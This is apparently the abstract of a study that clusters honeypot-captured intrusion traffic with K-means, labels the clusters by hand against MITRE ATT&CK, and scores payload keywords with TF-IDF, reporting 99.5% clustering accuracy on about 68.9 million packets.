This study uses TF-IDF (Term Frequency-Inverse Document Frequency) word weighting technique for information retrieval and text mining. Collect information about attackers' intrusion into the system through Honeypot, and combine data classification, manual labeling, machine learning, and K-means algorithm to provide reliable and labeled data sets with labels provided by third-party frameworks. The proposed method is mainly divided into three parts: A. Using the K-means algorithm to classify the raw data collected by Honeypots into different clusters. B. Manually label each cluster to provide reliable information according to MITER ATT&CK. C. Each keyword score in the payload is given using TF-IDF technique and sorted into the session table. In this study, 68,936,206 packets of data are used as test data, and the proposed method can cluster the data with an accuracy rate of 99.5%.